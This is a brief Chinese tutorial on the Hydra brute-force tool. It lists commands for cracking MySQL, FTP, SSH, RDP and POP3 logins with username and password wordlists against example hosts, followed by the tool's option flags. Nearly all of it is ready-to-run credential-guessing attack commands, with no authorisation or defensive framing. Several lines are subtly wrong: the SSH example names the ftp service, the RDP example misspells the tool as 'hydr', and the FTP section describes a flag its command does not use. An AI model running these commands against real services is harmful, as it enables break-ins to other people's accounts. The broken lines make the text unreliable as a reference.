linux下很简单的暴力破解工具,能不能破解主要看字典。
hydra语法: hydra -[参数] IP(主机) 服务
1、破解Mysql:
hydra -L c:\user.txt -P c:\pass.txt 192.168.0.1 mysql
-L:指定用户名字典
-P:指定密码字典
2、破解FTP密码:
hydra -L c:\user.txt -P c:\pass.txt -t 5 192.168.0.1 ftp
-l:指定用户名
-t:指定线程
3、破解ssh:
hydra -L c:\user.txt -P c:\pass.txt -e n -t 5 -vV 192.168.0.1 ftp
-e n:进行空密码探测
4、破解rdp(3389)
hydr -l administrator -P c:\pass.txt -e n -t 5 www.xxx.com rdp -V
破解www.xxx.com的3389端口
5、破解pop3:
hydra -l root -P pass.txt my.pop3.mail pop3
在未指定文件绝对路径,hydra会在本目录去查找文件
hydra详细参数:
- -R: 继续上一次进度开始破解
- -S:(大写):采用ssl连接
- -s port:如果非默认端口可通过这个参数指定
- -l login:小写,指定用户破解
- -L file:大写,用指定的用户名字典
- -p pass:小写,用于指定密码破解,少用,一般采用密码字典
- -P file:大写,用于指定密码字典
- -e ns:额外选项,n:空密码试探,s:使用指定账户和密码试探
- -C file:使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
- -N file:指定目标列表文件(一行一条)
- -o file:指定结果输出文件
- -f :找到第一对登录名或者密码时终止破解
- -t tasks:同时运行的线程数,默认16
- -w time:设置最大超时时间,单位秒,默认30s
- -V/-v: 显示详细过程
- server :目标ip
- service:指定服务器名,支持的服务和协议有:telnet,ftp,pop3,imap,smb,smbnt,mssql,mysql,pcanywhere,teamspeak,si等